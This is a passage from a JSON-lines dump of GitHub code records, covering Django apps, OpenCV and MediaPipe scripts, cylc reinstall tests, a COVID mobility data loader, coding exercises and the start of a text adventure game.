Overwrite?\\n\\n \" + fname, 9, 0)\n yesnodlg.add_buttons([(\"Yes\", 0), (\"No\", 1)])\n rv, junk = yesnodlg.main()\n if rv == 0:\n return fname\n # if no, then go thru selection again\n else:\n return fname\n\n def askokcancel(self, title, msg):\n self.info(msg, None)\n return False\n\n # Process invalid input values and invoke a query dialog\n def process_bad_entries(self, badEntriesList, taskname):\n\n tpl = \"{:>20s} {:>20s} {:>20s}\\n\"\n badEntriesString = \"\\nTask \" + taskname.upper() + \\\n \" -- Invalid values have been entered.\\n\\n\"\n badEntriesString += tpl.format(\"Parameter\", \"Bad Value\", \"Reset Value\")\n for i in range(len(badEntriesList)):\n badEntriesString += tpl.format(badEntriesList[i][0].strip(),\n badEntriesList[i][1].strip(),\n badEntriesList[i][2].strip())\n\n badEntriesString += \"\\nOK to continue using\"\\\n \" the reset\\nvalues or cancel to re-enter\\nvalues?\\n\"\n\n # Invoke the modal message dialog\n return (self.askokcancel(\"Notice\", badEntriesString))\n\n # TparOption values for non-string types\n _tparOptionDict = {\n \"b\": BooleanTparOption,\n \"r\": NumberTparOption,\n \"d\": NumberTparOption,\n \"i\": NumberTparOption,\n \"pset\": PsetTparOption,\n \"ar\": NumberTparOption,\n \"ai\": NumberTparOption,\n }\n\n def tpar_option_factory(self, param, defaultParam):\n \"\"\"Return TparOption item of appropriate type for the parameter param\"\"\"\n # If there is an enumerated list, regardless of datatype, use\n # the EnumTparOption\n if (param.choice is not None):\n tparOption = EnumTparOption\n else:\n # Use String for types not in the dictionary\n tparOption = self._tparOptionDict.get(param.type, StringTparOption)\n return tparOption(param, defaultParam, self.inform)\n\n\ndef tpar(taskName):\n if isinstance(urwid, FakeModule):\n print(f'''\nThe urwid package isn't found on your Python system so tpar can't be used.'\n (the error given: \"{urwid.the_error}\")'\nPlease install urwid or use epar instead.\n''', file=sys.stderr)\n return\n TparDisplay(taskName).main()\n","repo_name":"iraf-community/pyraf","sub_path":"pyraf/tpar.py","file_name":"tpar.py","file_ext":"py","file_size_in_byte":45984,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"47"} +{"seq_id":"33610402455","text":"\"\"\"\nRegister your models here.\nbasically registering and showing all of our models on the admin portal\n\"\"\"\nfrom django.contrib import admin\nfrom .models import Classroom, Assignment\n\nclass ClassroomAdmin(admin.ModelAdmin):\n \"\"\"\n Model storing all classes\n \"\"\"\n list_display = ('className', 'courseID', 'teacher', 'classTeacherMail', 'classCode')\n \nclass AssignmentAdmin(admin.ModelAdmin):\n \"\"\"\n Model storing all classes\n \"\"\"\n list_display = ('title', 'description', 'assignmentCode',\n 'link', 'classroom', 'video',)\n\n\n# registering the models so that we can access them in admin panel\nadmin.site.register(Classroom, ClassroomAdmin)\nadmin.site.register(Assignment, AssignmentAdmin)\n\n","repo_name":"saksham117/Augmented_Reality_Chatbot","sub_path":"neobot/classRoom/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"41061046247","text":"import cv2\nimport mediapipe as mp\n\n# Inicialize o MediaPipe\nmp_pose = mp.solutions.pose\npose = mp_pose.Pose()\n\n# Inicialize a captura de vídeo da webcam\ncap = cv2.VideoCapture(0)\n\nwhile True:\n ret, frame = cap.read()\n\n if 
    ret, frame = cap.read()\n\n    if not ret:\n        break\n\n    # Run pose detection (MediaPipe expects RGB input, so convert from BGR)\n    results = pose.process(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n\n    # Draw the positions of the body landmarks on the image\n    if results.pose_landmarks:\n        for landmark in results.pose_landmarks.landmark:\n            # Convert the normalized coordinates to pixel coordinates\n            h, w, c = frame.shape\n            cx, cy = int(landmark.x * w), int(landmark.y * h)\n            \n            # Draw a circle at each landmark\n            cv2.circle(frame, (cx, cy), 5, (0, 255, 0), -1)\n\n    # Display the image with the detections\n    cv2.imshow('Body Detection', frame)\n\n    # Exit the loop when the 'q' key is pressed\n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n\n# Release the video capture and close the windows\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"leandric/visao_computacional","sub_path":"projetos/testes/corpo.py","file_name":"corpo.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"16594952717","text":"# forms.py\nfrom django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .models import PlantationUser\n\nclass RegistrationForm(UserCreationForm):\n    email = forms.EmailField(max_length=254, help_text='Required. Enter a valid email address.')\n\n    class Meta:\n        model = PlantationUser\n        fields = ('first_name', 'last_name', 'email', 'password1', 'password2')\n\n        widgets = {\n            \"as_admin\": forms.TextInput(attrs={\"placeholder\": \"please enter your employment id\"})\n        }\n\nclass RadioSelectWidget(forms.widgets.Widget):\n    template_name = 'radio.html'  # You can customize the template for your radio buttons\n\n    def get_context(self, name, value, attrs):\n        context = super().get_context(name, value, attrs)\n        context['widget']['is_radio'] = True  # Add a flag to distinguish radio buttons\n        return context\n\n\nclass PlantationUpdateUserForm(forms.ModelForm):\n    class Meta:\n        model = PlantationUser\n        fields = (\"role\",)\n\n        widgets = {\n            \"role\": forms.RadioSelect(),\n        }\n\n    def __init__(self, *args, **kwargs):\n        super(PlantationUpdateUserForm, self).__init__(*args, **kwargs)\n\n        # Set the empty_label to None for the select field\n        self.fields['role'].choices = PlantationUser.ROLE\n\n","repo_name":"sanelemngadi/plantation-3","sub_path":"user/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"39851759436","text":"from unittest import TestCase\n\nfrom django.contrib.auth.models import User\nfrom rest_framework import status\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.test import APITestCase, APIClient\nfrom rest_framework.reverse import reverse\n\nCOMPLETED_DESK_URL = reverse('desk_completed-list')\n\n\nclass PublicUserDeskApiTest(TestCase):\n    \"\"\"\n    Testing unauthenticated desk API requests\n    \"\"\"\n\n    def setUp(self):\n        self.client = APIClient()\n\n    def test_account_auth_required(self):\n        response = self.client.get(COMPLETED_DESK_URL)\n        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateUserDeskApiTest(APITestCase):\n    \"\"\"\n    Testing authenticated API access\n    \"\"\"\n\n    def setUp(self):\n        self.user = User.objects.create_user(\n            username='test',\n            password='testpassword',\n            email='example@mail.ru'\n        )\n        self.token = Token.objects.create(user=self.user)\n        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)\n\n    def test_account_accessible_with_auth(self):\n        response 
= self.client.get(COMPLETED_DESK_URL)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n","repo_name":"rytpQWE/Helpdesk","sub_path":"app/desk/tests/test_api_completed_desk.py","file_name":"test_api_completed_desk.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71232898062","text":"import logging\nimport sqlite3\nimport sys\nfrom threading import Thread\nfrom typing import Iterable, Generator, Sequence\n\nfrom .util import connect_store_db\nfrom ..adapter import filesys\nfrom ..adapter.logging import get_logger\nfrom ..adapter.store import Store\nfrom ..model.config import Config\nfrom ..model.file_info import FileInfo\n\nLOGGER = get_logger(__name__)\n\n\ndef main(config: Config):\n config_desc = config_log_string(config)\n LOGGER.info(f\"Start: {config.name}\\n{config_desc}\")\n\n conn, store_db = connect_store_db(config)\n id = store_db.create_import(conn, config.name, config.metadata)\n\n if config.multithread:\n conn.close()\n store_multithread(config, id)\n else:\n store_singlethread(conn, store_db, config, id)\n\n print(id.hex(), file=sys.stdout)\n LOGGER.info(f\"End: {config.name}\\n{config_desc}\")\n\n\ndef store_multithread(config: Config, id: bytes):\n threads = [\n Thread(target=connect_and_store, args=(config, id, file_type, mps))\n for (file_type, mps) in config.match_paths.items()\n ]\n\n for th in threads:\n th.start()\n\n for th in threads:\n th.join()\n\n\ndef store_singlethread(\n conn: sqlite3.Connection, store_db: Store, config: Config, id: bytes\n):\n for (file_type, mps) in config.match_paths.items():\n store(conn, store_db, config, id, file_type, mps)\n\n\ndef connect_and_store(\n config: Config, id: bytes, file_type: str, match_paths: Sequence[str]\n):\n conn, store_db = connect_store_db(config)\n store(conn, store_db, config, id, file_type, match_paths)\n\n\ndef store(\n conn: sqlite3.Connection,\n store_db: Store,\n config: Config,\n id: bytes,\n file_type: str,\n match_paths: Sequence[str],\n):\n LOGGER.info(f\"Start file type: {file_type}\")\n files = filesys.search(\n config.root_dir,\n match_paths,\n file_type=file_type,\n gather_digests=config.compare_digests,\n is_archived=config.is_archived,\n calc_file_group=config.file_group_from,\n )\n\n if LOGGER.level <= logging.DEBUG: # don't degrade performance if not debugging\n files = log_store(files)\n\n store_db.import_files(conn, id, files)\n\n LOGGER.info(f\"End file type: {file_type}\")\n\n\ndef log_store(file_infos: Iterable[FileInfo]) -> Generator[FileInfo, None, None]:\n for file_info in file_infos:\n LOGGER.debug(f\"Storing: {file_info.file_name}\")\n yield file_info\n\n\ndef config_log_string(config: Config) -> str:\n return \"\\n\".join(\n [\n f\" root_dir: {config.root_dir}\",\n f\" store_db_file: {config.store_db_file}\",\n \" metadata:\",\n ]\n + [f\" {k}: {v}\" for (k, v) in config.metadata.items()]\n )\n","repo_name":"ericgj/fs-snapshot","sub_path":"fs_snapshot/command/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15286641693","text":"from suds.sax.date import UTC\nfrom datetime import datetime\n\n\nclass Util(object):\n\n def xml_datetime_difference(self, start, end=None):\n start_dt = UTC(start).datetime\n if end is None:\n # prevent adjustment for timezones due to daylight savings time\n end_dt = UTC(str(UTC())).datetime\n else:\n end_dt = 
UTC(end).datetime\n return (end_dt - start_dt).total_seconds()","repo_name":"anishasilva/robotframework-sudslibrary","sub_path":"test/resources/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"37869043741","text":"import sys\n\ntest = \"\"\"\\\n$ cd /\n$ ls\ndir a\n14848514 b.txt\n8504156 c.dat\ndir d\n$ cd a\n$ ls\ndir e\n29116 f\n2557 g\n62596 h.lst\n$ cd e\n$ ls\n584 i\n$ cd ..\n$ cd ..\n$ cd d\n$ ls\n4060174 j\n8033020 d.log\n5626152 d.ext\n7214296 k\"\"\"\n\n\nif 'test' in sys.argv:\n data = test.splitlines()\nelse:\n data = [s.rstrip() for s in open('day07.txt').readlines()]\n\nDEBUG = 'debug' in sys.argv\n\nclass Node:\n def __init__(self, name=''):\n self.name = name\n self.children = {}\n self.size = 0\n self.allsize = 0\n def __repr__(self):\n return f\" 40000000\n need = root.allsize - 40000000\n\n # Now do a top-down, remembering all sizes larger than \"need\".\n\n q = [root]\n poss = []\n while q:\n node = q.pop(0)\n if node.allsize >= need:\n poss.append(node.allsize)\n q.extend(list(node.children.values()))\n if DEBUG:\n print(poss)\n\n return qsum, min(poss)\n\nprint(\"Part 1, 2:\", part1(data))\n","repo_name":"timrprobocom/advent-of-code","sub_path":"2022/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72232672143","text":"import pandas as pd\nimport os\n\nstateToFips = {\"AL\": \"04000US01\", \"AK\": \"04000US02\", \"AZ\": \"04000US04\", \"AR\": \"04000US05\", \"CA\": \"04000US06\",\n \"CO\": \"04000US08\", \"CT\": \"04000US09\", \"DE\": \"04000US10\", \"DC\": \"04000US11\", \"FL\": \"04000US12\",\n \"GA\": \"04000US13\", \"HI\": \"04000US15\", \"ID\": \"04000US16\", \"IL\": \"04000US17\", \"IN\": \"04000US18\",\n \"IA\": \"04000US19\", \"KS\": \"04000US20\", \"KY\": \"04000US21\", \"LA\": \"04000US22\", \"ME\": \"04000US23\",\n \"MD\": \"04000US24\", \"MA\": \"04000US25\", \"MI\": \"04000US26\", \"MN\": \"04000US27\", \"MS\": \"04000US28\",\n \"MO\": \"04000US29\", \"MT\": \"04000US30\", \"NE\": \"04000US31\", \"NV\": \"04000US32\", \"NH\": \"04000US33\",\n \"NJ\": \"04000US34\", \"NM\": \"04000US35\", \"NY\": \"04000US36\", \"NC\": \"04000US37\", \"ND\": \"04000US38\",\n \"OH\": \"04000US39\", \"OK\": \"04000US40\", \"OR\": \"04000US41\", \"PA\": \"04000US42\", \"RI\": \"04000US44\",\n \"SC\": \"04000US45\", \"SD\": \"04000US46\", \"TN\": \"04000US47\", \"TX\": \"04000US48\", \"UT\": \"04000US49\",\n \"VT\": \"04000US50\", \"VA\": \"04000US51\", \"WA\": \"04000US53\", \"WV\": \"04000US54\", \"WI\": \"04000US55\",\n \"WY\": \"04000US56\"}\n\nstates = {\"Alabama\": \"AL\", \"Alaska\": \"AK\", \"Arizona\": \"AZ\", \"Arkansas\": \"AR\", \"California\": \"CA\", \"Colorado\": \"CO\",\n \"Connecticut\": \"CT\", \"District of Columbia\": \"DC\", \"Delaware\": \"DE\", \"Florida\": \"FL\", \"Georgia\": \"GA\",\n \"Hawaii\": \"HI\", \"Idaho\": \"ID\", \"Illinois\": \"IL\", \"Indiana\": \"IN\", \"Iowa\": \"IA\", \"Kansas\": \"KS\",\n \"Kentucky\": \"KY\", \"Louisiana\": \"LA\", \"Maine\": \"ME\", \"Maryland\": \"MD\", \"Massachusetts\": \"MA\", \"Michigan\": \"MI\",\n \"Minnesota\": \"MN\", \"Mississippi\": \"MS\", \"Missouri\": \"MO\", \"Montana\": \"MT\", \"Nebraska\": \"NE\", \"Nevada\": \"NV\",\n \"New Hampshire\": \"NH\", \"New Jersey\": \"NJ\", \"New Mexico\": \"NM\", \"New York\": \"NY\", \"North Carolina\": \"NC\",\n 
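# NOTE: full state names map to USPS codes here; the stateToFips dict\n          # above then maps those codes to Census GeoIDs; the two lookups are\n          # chained below as .replace(states).replace(stateToFips).\n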
\"North Dakota\": \"ND\", \"Ohio\": \"OH\", \"Oklahoma\": \"OK\", \"Oregon\": \"OR\", \"Pennsylvania\": \"PA\",\n \"Rhode Island\": \"RI\", \"South Carolina\": \"SC\", \"South Dakota\": \"SD\", \"Tennessee\": \"TN\", \"Texas\": \"TX\",\n \"Utah\": \"UT\", \"Vermont\": \"VT\", \"Virginia\": \"VA\", \"Washington\": \"WA\", \"West Virginia\": \"WV\",\n \"Wisconsin\": \"WI\", \"Wyoming\": \"WY\", \"Chicago\": \"IL\"}\n\ndf_google = pd.read_csv(\"https://www.gstatic.com/covid19/mobility/Global_Mobility_Report.csv\", low_memory=False)\n\ndf_google = df_google[df_google[\"country_region_code\"] == \"US\"]\ndf_google = df_google[(~df_google[\"sub_region_1\"].isna()) & (df_google[\"sub_region_2\"].isna())]\n\ndf_google = df_google.melt(\n id_vars=[\"country_region\", \"sub_region_1\", \"date\"],\n value_vars=[\n \"retail_and_recreation_percent_change_from_baseline\",\n \"grocery_and_pharmacy_percent_change_from_baseline\",\n \"parks_percent_change_from_baseline\",\n \"transit_stations_percent_change_from_baseline\",\n \"workplaces_percent_change_from_baseline\",\n \"residential_percent_change_from_baseline\"\n ]\n)\n\ndf_google[\"variable\"] = df_google[\"variable\"].replace({\n \"retail_and_recreation_percent_change_from_baseline\": \"Retail and Recreation\",\n \"grocery_and_pharmacy_percent_change_from_baseline\": \"Grocery and Pharmacy\",\n \"parks_percent_change_from_baseline\": \"Parks\",\n \"transit_stations_percent_change_from_baseline\": \"Transit Stations\",\n \"workplaces_percent_change_from_baseline\": \"Workplaces\",\n \"residential_percent_change_from_baseline\": \"Residential\"\n})\n\ndf_google = df_google.drop(columns=[\"country_region\"])\ndf_google = df_google.rename(columns={\n \"sub_region_1\": \"Geography\",\n \"date\": \"Date\",\n \"variable\": \"Type\",\n \"value\": \"Percent Change from Baseline\"\n})\n\ndf_google = df_google[~df_google[\"Geography\"].isna()]\ndf_google[\"ID Geography\"] = df_google[\"Geography\"].replace(states).replace(stateToFips)\ndf_google[\"Date\"] = df_google[\"Date\"].str.replace(\"-\", \"/\")\n\npath = os.path.dirname(os.path.abspath(\"__file__\")) + \"/static/mobilitycovid19.json\"\n\nprevious = pd.read_json(path) if os.path.exists(path) else pd.DataFrame([])\nif len(df_google) > len(previous):\n df_google.to_json(path, orient=\"records\")\n","repo_name":"DataUSA/datausa-site","sub_path":"mobilitycovid19.py","file_name":"mobilitycovid19.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"47"} +{"seq_id":"42669849083","text":"import numpy as np\r\nimport cv2 as cv\r\n\r\nimg = np.zeros((300,512, 3), np.uint8)\r\ncv.namedWindow('image')\r\ndef change(x):\r\n print(x)\r\n\r\ncv.createTrackbar('B', 'image', 0, 255, change)\r\ncv.createTrackbar('G', 'image', 0, 255, change)\r\ncv.createTrackbar('R', 'image', 0, 255, change)\r\n\r\nwhile(1):\r\n cv.imshow('image',img)\r\n k = cv.waitKey(1) & 0xFF\r\n if k == 27:\r\n break\r\n b = cv.getTrackbarPos('B','image')\r\n g = cv.getTrackbarPos('G','image')\r\n r = cv.getTrackbarPos('R','image')\r\n img[:] = [b,g,r]\r\n cv.imshow('image', img)\r\ncv.destroyAllWindows()","repo_name":"mystery2828/Image_processing","sub_path":"part8.py","file_name":"part8.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9418694527","text":"from django.db import models\n\n\nclass CategoriesProducts(models.Model):\n \"\"\"Таблица с категориями 
ФБ товаров/\n Сожержит единственную графу category, в которой хранится название категорий ФБ\"\"\"\n category = models.CharField(verbose_name='Категория', name='category', max_length=144)\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n def __str__(self):\n return self.category\n\n\nclass ProductFB(models.Model):\n \"\"\"Единица товара ФБ\n name - наименование товара\n price -цена товара\n count - их количество\n category - связь на таблицу CategoriesProducts, чтобы привязать к конкретной категории\n description - описание товара\n modal - хранит от значение от 1-n, нужна чтобы отслеживать какой товар нажимается\"\"\"\n name = models.CharField(verbose_name='Наименование товара', name='name', max_length=144)\n price = models.DecimalField(verbose_name='Цена', name='price', decimal_places=2, max_digits=10)\n count = models.IntegerField(verbose_name='Количество', name='count')\n category = models.ForeignKey(CategoriesProducts, on_delete=models.CASCADE)\n description = models.TextField(verbose_name='Описание', name='description')\n modal = models.CharField(name=\"modal\", max_length=128)\n # добавить строку урлов, в которой будет хранится сами файлы с данными\n # добавить класс таблицу с уралами\n\n class Meta:\n verbose_name = 'Товар'\n verbose_name_plural = 'Товары'\n\n def __str__(self):\n return self.name","repo_name":"aliensowo/lavka","sub_path":"facebook/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71364813904","text":"import sys\nimport collections\ntest = int(input())\n\n\nfor _ in range(test):\n n,m = map(int,sys.stdin.readline().rstrip().split())\n graph = [[] for _ in range(n+1)]\n queue = collections.deque()\n for i in range(m):\n a,b = map(int,sys.stdin.readline().rstrip().split())\n graph[a].append(b)\n graph[b].append(a)\n visited = [False]*(n+1)\n start = 1\n cnt =0\n queue.append(start)\n visited[start]=True\n while queue:\n cur = queue.popleft()\n for temp in graph[cur]:\n if visited[temp]==False:\n queue.append(temp)\n visited[temp] = True\n cnt+=1\n print(cnt)\n\n","repo_name":"CodeTest-StudyGroup/Code-Test-Study","sub_path":"seokgyuHong/백준/상근이의여행.py","file_name":"상근이의여행.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":1095,"dataset":"github-code","pt":"47"} +{"seq_id":"13857673426","text":"from pathlib import Path\nfrom types import SimpleNamespace\nfrom uuid import uuid1\n\nimport pytest\n\nfrom cylc.flow.exceptions import (\n WorkflowFilesError,\n)\nfrom cylc.flow.install import (\n reinstall_workflow,\n)\nfrom cylc.flow.option_parsers import Options\nfrom cylc.flow.scripts.reinstall import (\n get_option_parser as reinstall_gop,\n reinstall_cli,\n)\nfrom cylc.flow.terminal import cli_function\nfrom cylc.flow.workflow_files import (\n WorkflowFiles,\n)\n\n\nReInstallOptions = Options(reinstall_gop())\n\n# cli opts\n\n# interactive: yes no\n# rose: yes no\n# workflow_running: yes no\n\n\n@pytest.fixture\ndef interactive(monkeypatch):\n monkeypatch.setattr(\n 'cylc.flow.scripts.reinstall.is_terminal',\n lambda: True,\n )\n\n\n@pytest.fixture\ndef non_interactive(monkeypatch):\n monkeypatch.setattr(\n 'cylc.flow.scripts.reinstall.is_terminal',\n lambda: False,\n )\n\n\n@pytest.fixture\ndef one_src(tmp_path):\n src_dir = tmp_path\n (src_dir / 'flow.cylc').touch()\n (src_dir / 'rose-suite.conf').touch()\n return 
SimpleNamespace(path=src_dir)\n\n\n@pytest.fixture\ndef one_run(one_src, test_dir, run_dir):\n w_run_dir = test_dir / str(uuid1())\n w_run_dir.mkdir()\n (w_run_dir / 'flow.cylc').touch()\n (w_run_dir / 'rose-suite.conf').touch()\n install_dir = (w_run_dir / WorkflowFiles.Install.DIRNAME)\n install_dir.mkdir(parents=True)\n (install_dir / WorkflowFiles.Install.SOURCE).symlink_to(\n one_src.path,\n target_is_directory=True,\n )\n return SimpleNamespace(\n path=w_run_dir,\n id=str(w_run_dir.relative_to(run_dir)),\n )\n\n\ndef test_rejects_random_workflows(one):\n \"\"\"It should only work with workflows installed by cylc install.\"\"\"\n with pytest.raises(WorkflowFilesError) as exc_ctx:\n reinstall_cli(opts=ReInstallOptions(), args=one.workflow)\n assert 'was not installed with cylc install' in str(exc_ctx.value)\n\n\ndef test_invalid_source_dir(one_src, one_run):\n \"\"\"It should detect & fail for an invalid source symlink\"\"\"\n source_link = Path(\n one_run.path,\n WorkflowFiles.Install.DIRNAME,\n WorkflowFiles.Install.SOURCE,\n )\n source_link.unlink()\n source_link.symlink_to(one_src.path / 'flow.cylc')\n\n with pytest.raises(WorkflowFilesError) as exc_ctx:\n reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert 'Workflow source dir is not accessible' in str(exc_ctx.value)\n\n\ndef test_no_changes_needed(one_src, one_run, capsys, interactive):\n \"\"\"It should not reinstall if no changes are needed.\n\n This is not a hard requirement, in practice rsync output may differ\n from expectation so this is a nice-to-have, not expected to work 100%\n of the time.\n \"\"\"\n assert not reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert 'up to date with' in capsys.readouterr().out\n\n\ndef test_non_interactive(one_src, one_run, capsys, capcall, non_interactive):\n \"\"\"It should not perform a dry-run or prompt in non-interactive mode.\"\"\"\n # capture reinstall calls\n reinstall_calls = capcall(\n 'cylc.flow.scripts.reinstall.reinstall_workflow',\n reinstall_workflow,\n )\n # give it something to reinstall\n (one_src.path / 'a').touch()\n # reinstall\n assert reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n # only one rsync call should have been made (i.e. no --dry-run)\n assert len(reinstall_calls) == 1\n assert 'Successfully reinstalled' in capsys.readouterr().out\n\n\ndef test_interactive(\n one_src,\n one_run,\n capsys,\n capcall,\n interactive,\n monkeypatch\n):\n \"\"\"It should perform a dry-run and prompt in interactive mode.\"\"\"\n # capture reinstall calls\n reinstall_calls = capcall(\n 'cylc.flow.scripts.reinstall.reinstall_workflow',\n reinstall_workflow,\n )\n # give it something to reinstall\n (one_src.path / 'a').touch()\n\n # reinstall answering \"no\" to any prompt\n monkeypatch.setattr(\n 'cylc.flow.scripts.reinstall._input',\n lambda x: 'n'\n )\n assert reinstall_cli(opts=ReInstallOptions(), args=one_run.id) is False\n\n # only one rsync call should have been made (i.e. the --dry-run)\n assert [call[1].get('dry_run') for call in reinstall_calls] == [True]\n assert 'Reinstall canceled, no changes made.' in capsys.readouterr().out\n reinstall_calls.clear()\n\n # reinstall answering \"yes\" to any prompt\n monkeypatch.setattr(\n 'cylc.flow.scripts.reinstall._input',\n lambda x: 'y'\n )\n assert reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n\n # two rsync calls should have been made (i.e. 
the --dry-run and the real)\n assert [call[1].get('dry_run') for call in reinstall_calls] == [\n True, False\n ]\n assert 'Successfully reinstalled' in capsys.readouterr().out\n\n\ndef test_workflow_running(\n one_src,\n one_run,\n monkeypatch,\n capsys,\n non_interactive,\n):\n \"\"\"It should advise running \"cylc reload\" where applicable.\"\"\"\n # the message we are expecting\n reload_message = f'Run \"cylc reload {one_run.id}\"'\n\n # reinstall with a stopped workflow (reload message shouldn't show)\n assert reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert reload_message not in capsys.readouterr().out\n\n # reinstall with a running workflow (reload message should show)\n monkeypatch.setattr(\n # make it look like the workflow is running\n 'cylc.flow.scripts.reinstall.load_contact_file',\n lambda x: None,\n )\n assert reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert reload_message in capsys.readouterr().out\n\n\ndef test_rsync_stuff(one_src, one_run, capsys, non_interactive):\n \"\"\"Make sure rsync is working correctly.\"\"\"\n # src contains files: a, b\n (one_src.path / 'a').touch()\n with open(one_src.path / 'b', 'w+') as b_file:\n b_file.write('x')\n (one_src.path / 'b').touch()\n\n # run contains files: b, c (where b is different to the source copy)\n (one_run.path / 'b').touch()\n (one_run.path / 'c').touch()\n\n reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n\n # a should have been left\n assert (one_run.path / 'a').exists()\n # b should have been updated\n assert (one_run.path / 'b').exists()\n with open(one_run.path / 'b', 'r') as b_file:\n assert b_file.read() == 'x'\n # c should have been removed\n assert not (one_run.path / 'c').exists()\n\n\ndef test_rose_warning(one_src, one_run, capsys, interactive, monkeypatch):\n \"\"\"It should warn that Rose installed files will be deleted.\n\n See https://github.com/cylc/cylc-rose/issues/149\n \"\"\"\n # fragment of the message we expect\n rose_message = (\n 'Files created by Rose file installation will show as deleted'\n )\n\n # reinstall answering \"no\" to any prompt\n monkeypatch.setattr(\n 'cylc.flow.scripts.reinstall._input',\n lambda x: 'n'\n )\n (one_src.path / 'a').touch() # give it something to install\n\n # reinstall (with rose-suite.conf file)\n reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert rose_message in capsys.readouterr().err\n\n # reinstall (no rose-suite.conf file)\n (one_src.path / 'rose-suite.conf').unlink()\n reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert rose_message not in capsys.readouterr().err\n\n\ndef test_keyboard_interrupt(\n one_src,\n one_run,\n interactive,\n monkeypatch,\n capsys\n):\n \"\"\"It should handle a KeyboardInterrupt during dry-run elegantly.\n\n E.G. A user may ctrl+c rather than answering \"n\" (for no). 
To make it\n clear a canceled message should show.\n \"\"\"\n def raise_keyboard_interrupt():\n raise KeyboardInterrupt()\n\n # currently the first call in the dry-run branch\n monkeypatch.setattr(\n 'cylc.flow.scripts.reinstall.is_terminal',\n raise_keyboard_interrupt,\n )\n\n reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert 'Reinstall canceled, no changes made' in capsys.readouterr().out\n\n\ndef test_rsync_fail(one_src, one_run, mock_glbl_cfg, non_interactive):\n \"\"\"It should raise an error on rsync failure.\"\"\"\n mock_glbl_cfg(\n 'cylc.flow.install.glbl_cfg',\n '''\n [platforms]\n [[localhost]]\n rsync command = false\n ''',\n )\n\n (one_src.path / 'a').touch() # give it something to install\n with pytest.raises(WorkflowFilesError) as exc_ctx:\n reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert 'An error occurred reinstalling' in str(exc_ctx.value)\n","repo_name":"cylc/cylc-flow","sub_path":"tests/integration/test_reinstall.py","file_name":"test_reinstall.py","file_ext":"py","file_size_in_byte":8587,"program_lang":"python","lang":"en","doc_type":"code","stars":304,"dataset":"github-code","pt":"47"} +{"seq_id":"72952305423","text":"\"\"\"\nJoshua Chuah\nA01334966\n\"\"\"\nimport random\nimport time\nimport sys\nimport itertools\nimport typing\n\n\ndef make_board(rows: int, columns: int) -> dict:\n \"\"\"\n creates and returns a board whose coordinates are filled with location names\n\n :param rows: an integer\n :param columns: an integer\n :precondition: rows must be an integer\n :precondition: columns must be an integer\n :postcondition: creates a board containing tuples as coordinates filled with location names\n :postcondition: marks the special locations of Entia on the board\n :return: a board containing tuples as coordinates filled with location names\n >>> make_board(5, 5)\n {(0, 0): ['Stowry Village'], (0, 1): ['Margrove Pass'], (0, 2): ['Entia Field'], (0, 3): ['Entia Field'], (0, 4): ['Makna Harbour'], (1, 0): ['Margrove Pass'], (1, 1): ['Margrove Pass'], (1, 2): ['Entia Field'], (1, 3): ['Entia Field'], (1, 4): ['Entia Capital City'], (2, 0): ['Entia Field'], (2, 1): ['Entia Field'], (2, 2): ['Entia Field'], (2, 3): ['Entia Lake'], (2, 4): ['Entia Field'], (3, 0): ['Entia Field'], (3, 1): ['Entia Field'], (3, 2): ['Entia Field'], (3, 3): ['Satorl Forest'], (3, 4): ['Entia Field'], (4, 0): ['Entia Field'], (4, 1): ['Entia Field'], (4, 2): ['Entia Field'], (4, 3): [\"Drakon's Castle\"], (4, 4): ['Entia Field']}\n \"\"\"\n board = {}\n\n for row in range(rows):\n for column in range(columns):\n board[(row, column)] = [\"Entia Field\"]\n\n board[(0, 0)] = [\"Stowry Village\"]\n board[(1, 0)] = ['Margrove Pass']\n board[(0, 1)] = ['Margrove Pass']\n 